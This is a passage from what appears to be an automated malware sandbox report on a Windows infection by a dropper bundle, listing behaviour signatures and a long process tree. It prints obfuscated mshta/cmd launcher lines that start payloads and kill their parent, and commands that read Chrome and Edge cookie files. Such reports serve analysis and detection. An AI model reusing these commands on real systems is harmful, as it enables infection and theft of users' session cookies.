C:\Users\Admin\AppData\Local\Temp\is-9L90V.tmp\Setup.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (6).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (6).exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\D7NyfNn2ltpUP1kEt4R9InkN.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\D7NyfNn2ltpUP1kEt4R9InkN.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\11111.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\11111.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\3300666.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\4464286.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\KPILVtzG__MhYfUlByzuGiAu.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\cOczhFVnOyKSRsPELdcpkTie.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\hMOkZHYImoDvLaSAXvcVWIzw.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\dKoMKenWr0odB6tjTFVUEYzN.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\UkdBd92nKdEVxt7NH_xJ86WB.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\4160488.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C50.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\MaskVPN\patchs\{F7272CFD-2FF2-4971-9BBA-D45F35549C00}\MaskVPNUpdate.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\MaskVPN\MaskVPN.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\MaskVPN\MaskVPN.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup (6).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (6).exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv JpBiMc005kCl+++s0Rv5PA.0.2
C:\Users\Admin\Documents\5g155f05UWRmP1NMH4W4qYQE.exe
"C:\Users\Admin\Documents\5g155f05UWRmP1NMH4W4qYQE.exe"
C:\Users\Admin\Documents\hMOkZHYImoDvLaSAXvcVWIzw.exe
"C:\Users\Admin\Documents\hMOkZHYImoDvLaSAXvcVWIzw.exe"
C:\Users\Admin\Documents\I7r1FrUEwNmYSO5O6BudkuEm.exe
"C:\Users\Admin\Documents\I7r1FrUEwNmYSO5O6BudkuEm.exe"
C:\Users\Admin\Documents\9MdZHB4RT9VorACFSmxAwYl_.exe
"C:\Users\Admin\Documents\9MdZHB4RT9VorACFSmxAwYl_.exe"
C:\Users\Admin\Documents\BwJRfBfq36dSRDtBrEnJs67c.exe
"C:\Users\Admin\Documents\BwJRfBfq36dSRDtBrEnJs67c.exe"
C:\Users\Admin\Documents\D7NyfNn2ltpUP1kEt4R9InkN.exe
"C:\Users\Admin\Documents\D7NyfNn2ltpUP1kEt4R9InkN.exe"
C:\Users\Admin\Documents\Bmon58itJgs11B2KVxxKPLEk.exe
"C:\Users\Admin\Documents\Bmon58itJgs11B2KVxxKPLEk.exe"
C:\Users\Admin\Documents\UGzUTsbixNOhMPqGeJbYYKkc.exe
"C:\Users\Admin\Documents\UGzUTsbixNOhMPqGeJbYYKkc.exe"
C:\Users\Admin\Documents\KPILVtzG__MhYfUlByzuGiAu.exe
"C:\Users\Admin\Documents\KPILVtzG__MhYfUlByzuGiAu.exe"
C:\Users\Admin\Documents\dKoMKenWr0odB6tjTFVUEYzN.exe
"C:\Users\Admin\Documents\dKoMKenWr0odB6tjTFVUEYzN.exe"
C:\Users\Admin\Documents\FZGPWOKivnlOwPBp3qi1ZH5_.exe
"C:\Users\Admin\Documents\FZGPWOKivnlOwPBp3qi1ZH5_.exe"
C:\Users\Admin\Documents\cOczhFVnOyKSRsPELdcpkTie.exe
"C:\Users\Admin\Documents\cOczhFVnOyKSRsPELdcpkTie.exe"
C:\Users\Admin\Documents\VqyObf4LcT48rEiucdt88i1S.exe
"C:\Users\Admin\Documents\VqyObf4LcT48rEiucdt88i1S.exe"
C:\Users\Admin\Documents\wMbMMutmbc3wkE_UihdUddVP.exe
"C:\Users\Admin\Documents\wMbMMutmbc3wkE_UihdUddVP.exe"
C:\Users\Admin\Documents\PpQsW20a0P92HEBP_c6swrBX.exe
"C:\Users\Admin\Documents\PpQsW20a0P92HEBP_c6swrBX.exe"
C:\Users\Admin\Documents\SnQLiiMZM1MWNrnfXeXFjIHe.exe
"C:\Users\Admin\Documents\SnQLiiMZM1MWNrnfXeXFjIHe.exe"
C:\Users\Admin\Documents\PEeSC0G_vMaXEqMToqHM8ep_.exe
"C:\Users\Admin\Documents\PEeSC0G_vMaXEqMToqHM8ep_.exe"
C:\Users\Admin\Documents\UkdBd92nKdEVxt7NH_xJ86WB.exe
"C:\Users\Admin\Documents\UkdBd92nKdEVxt7NH_xJ86WB.exe"
C:\Users\Admin\Documents\Xirs6iF07tjQgRKa5Latew69.exe
"C:\Users\Admin\Documents\Xirs6iF07tjQgRKa5Latew69.exe"
C:\Users\Admin\Documents\DA0SNTjID05uVTiLF3fjEqmT.exe
"C:\Users\Admin\Documents\DA0SNTjID05uVTiLF3fjEqmT.exe"
C:\Users\Admin\Documents\nmfd5A2zNFAjc1TaYF9LeeAp.exe
"C:\Users\Admin\Documents\nmfd5A2zNFAjc1TaYF9LeeAp.exe"
C:\Users\Admin\Documents\yO7mDRoKTxQNVKo1cz01yuON.exe
"C:\Users\Admin\Documents\yO7mDRoKTxQNVKo1cz01yuON.exe"
C:\Users\Admin\Documents\3XmERurioHYXIlaMfjxzhaK5.exe
"C:\Users\Admin\Documents\3XmERurioHYXIlaMfjxzhaK5.exe"
C:\Users\Admin\Documents\0L5QBYtSeFhpAWHjSvyEKKsB.exe
"C:\Users\Admin\Documents\0L5QBYtSeFhpAWHjSvyEKKsB.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Users\Admin\Documents\CkJ9CdreuYi6HGiUXWQeJZ3R.exe
"C:\Users\Admin\Documents\CkJ9CdreuYi6HGiUXWQeJZ3R.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\UGzUTsbixNOhMPqGeJbYYKkc.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\UGzUTsbixNOhMPqGeJbYYKkc.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Users\Admin\Documents\6ZxSebdQVdQkYVBi5haJVHHK.exe
"C:\Users\Admin\Documents\6ZxSebdQVdQkYVBi5haJVHHK.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2500 -ip 2500
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2500 -s 316
C:\Users\Admin\AppData\Local\Temp\is-EOUKU.tmp\6ZxSebdQVdQkYVBi5haJVHHK.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EOUKU.tmp\6ZxSebdQVdQkYVBi5haJVHHK.tmp" /SL5="$202F8,138429,56832,C:\Users\Admin\Documents\6ZxSebdQVdQkYVBi5haJVHHK.exe"
C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
C:\Users\Admin\Documents\wMbMMutmbc3wkE_UihdUddVP.exe
C:\Users\Admin\Documents\wMbMMutmbc3wkE_UihdUddVP.exe
C:\Users\Admin\Documents\9MdZHB4RT9VorACFSmxAwYl_.exe
C:\Users\Admin\Documents\9MdZHB4RT9VorACFSmxAwYl_.exe
C:\Users\Admin\Documents\BwJRfBfq36dSRDtBrEnJs67c.exe
C:\Users\Admin\Documents\BwJRfBfq36dSRDtBrEnJs67c.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\UGzUTsbixNOhMPqGeJbYYKkc.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\UGzUTsbixNOhMPqGeJbYYKkc.exe" ) do taskkill -f -iM "%~NxA"
C:\Users\Admin\Documents\Xirs6iF07tjQgRKa5Latew69.exe
"C:\Users\Admin\Documents\Xirs6iF07tjQgRKa5Latew69.exe" -q
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\Documents\D7NyfNn2ltpUP1kEt4R9InkN.exe
"C:\Users\Admin\Documents\D7NyfNn2ltpUP1kEt4R9InkN.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4552 -ip 4552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4544 -ip 4544
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 4592 -ip 4592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 3004 -ip 3004
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 316
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 1364 -ip 1364
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "UGzUTsbixNOhMPqGeJbYYKkc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 2332 -ip 2332
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 292
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Users\Admin\AppData\Roaming\6202460.exe
"C:\Users\Admin\AppData\Roaming\6202460.exe"
C:\Users\Admin\AppData\Roaming\2354821.exe
"C:\Users\Admin\AppData\Roaming\2354821.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3004 -s 320
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 1584 -ip 1584
C:\Users\Admin\AppData\Roaming\4160488.exe
"C:\Users\Admin\AppData\Roaming\4160488.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 288
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
C:\Users\Admin\AppData\Roaming\6315823.exe
"C:\Users\Admin\AppData\Roaming\6315823.exe"
C:\Users\Admin\Documents\cOczhFVnOyKSRsPELdcpkTie.exe
"C:\Users\Admin\Documents\cOczhFVnOyKSRsPELdcpkTie.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2556 -ip 2556
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2556 -s 280
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5464 -ip 5464
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 460
C:\Users\Admin\AppData\Local\Temp\is-RI3GK.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-RI3GK.tmp\Setup.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-07BU4.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-07BU4.tmp\Inlog.tmp" /SL5="$80034,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-M5KJM.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-M5KJM.tmp\WEATHER Manager.tmp" /SL5="$600F0,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
C:\Users\Admin\AppData\Local\Temp\is-L67RO.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L67RO.tmp\MediaBurner2.tmp" /SL5="$802EA,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Users\Admin\AppData\Local\Temp\is-HGUIN.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HGUIN.tmp\VPN.tmp" /SL5="$2033A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\is-GRJB0.tmp\3377047_logo_media.exe
"C:\Users\Admin\AppData\Local\Temp\is-GRJB0.tmp\3377047_logo_media.exe" /S /UID=burnerch2
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 6052 -ip 6052
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6052 -s 292
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 540 -p 5228 -ip 5228
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5228 -s 2192
C:\Users\Admin\AppData\Roaming\2898793.exe
"C:\Users\Admin\AppData\Roaming\2898793.exe"
C:\Users\Admin\Documents\68rM4Df0tmVh7ylRt_3_UMVw.exe
"C:\Users\Admin\Documents\68rM4Df0tmVh7ylRt_3_UMVw.exe"
C:\Users\Admin\Documents\byndKbrX3D7tT1BV1BFMtRj3.exe
"C:\Users\Admin\Documents\byndKbrX3D7tT1BV1BFMtRj3.exe"
C:\Users\Admin\AppData\Roaming\3300666.exe
"C:\Users\Admin\AppData\Roaming\3300666.exe"
C:\Users\Admin\Documents\YGcAK_perU4ud6by4adZLiI2.exe
"C:\Users\Admin\Documents\YGcAK_perU4ud6by4adZLiI2.exe"
C:\Users\Admin\Documents\RPRXYsBE_iDk29SlTGPOZ4jh.exe
"C:\Users\Admin\Documents\RPRXYsBE_iDk29SlTGPOZ4jh.exe"
C:\Users\Admin\Documents\1W66d4PrbYOtmxlxfQV7OpB0.exe
"C:\Users\Admin\Documents\1W66d4PrbYOtmxlxfQV7OpB0.exe"
C:\Users\Admin\Documents\s27w7dhtXK2yj0R0i9jmP7AH.exe
"C:\Users\Admin\Documents\s27w7dhtXK2yj0R0i9jmP7AH.exe"
C:\Users\Admin\Documents\lgJGQ8WVm0TB30ZFEEjC5Nff.exe
"C:\Users\Admin\Documents\lgJGQ8WVm0TB30ZFEEjC5Nff.exe"
C:\Users\Admin\Documents\MErB0oiECFInvOnN0pMZsfJQ.exe
"C:\Users\Admin\Documents\MErB0oiECFInvOnN0pMZsfJQ.exe"
C:\Users\Admin\Documents\NUc1s3wqp1OTSn6gv7mG4x9h.exe
"C:\Users\Admin\Documents\NUc1s3wqp1OTSn6gv7mG4x9h.exe"
C:\Users\Admin\Documents\v9K30AslqXxTdhna47O_zTpt.exe
"C:\Users\Admin\Documents\v9K30AslqXxTdhna47O_zTpt.exe"
C:\Users\Admin\Documents\SfVBdIOiSO1PlUwI_omN_q1E.exe
"C:\Users\Admin\Documents\SfVBdIOiSO1PlUwI_omN_q1E.exe"
C:\Users\Admin\Documents\tdQsgapgd7CCgb2Nac7hGQFU.exe
"C:\Users\Admin\Documents\tdQsgapgd7CCgb2Nac7hGQFU.exe"
C:\Users\Admin\Documents\O6l_34ZlnyulMJJIlKNPfWmb.exe
"C:\Users\Admin\Documents\O6l_34ZlnyulMJJIlKNPfWmb.exe"
C:\Users\Admin\Documents\0NPsMhwzVCJelUh4phYi5RpH.exe
"C:\Users\Admin\Documents\0NPsMhwzVCJelUh4phYi5RpH.exe"
C:\Users\Admin\Documents\ylquALTsOTov0ohMF2vhTPvm.exe
"C:\Users\Admin\Documents\ylquALTsOTov0ohMF2vhTPvm.exe"
C:\Users\Admin\Documents\kVbN8nA6g_JvvaAlYoRMLaMH.exe
"C:\Users\Admin\Documents\kVbN8nA6g_JvvaAlYoRMLaMH.exe"
C:\Users\Admin\Documents\DcuJbapcOStMsK_sofvjH1rd.exe
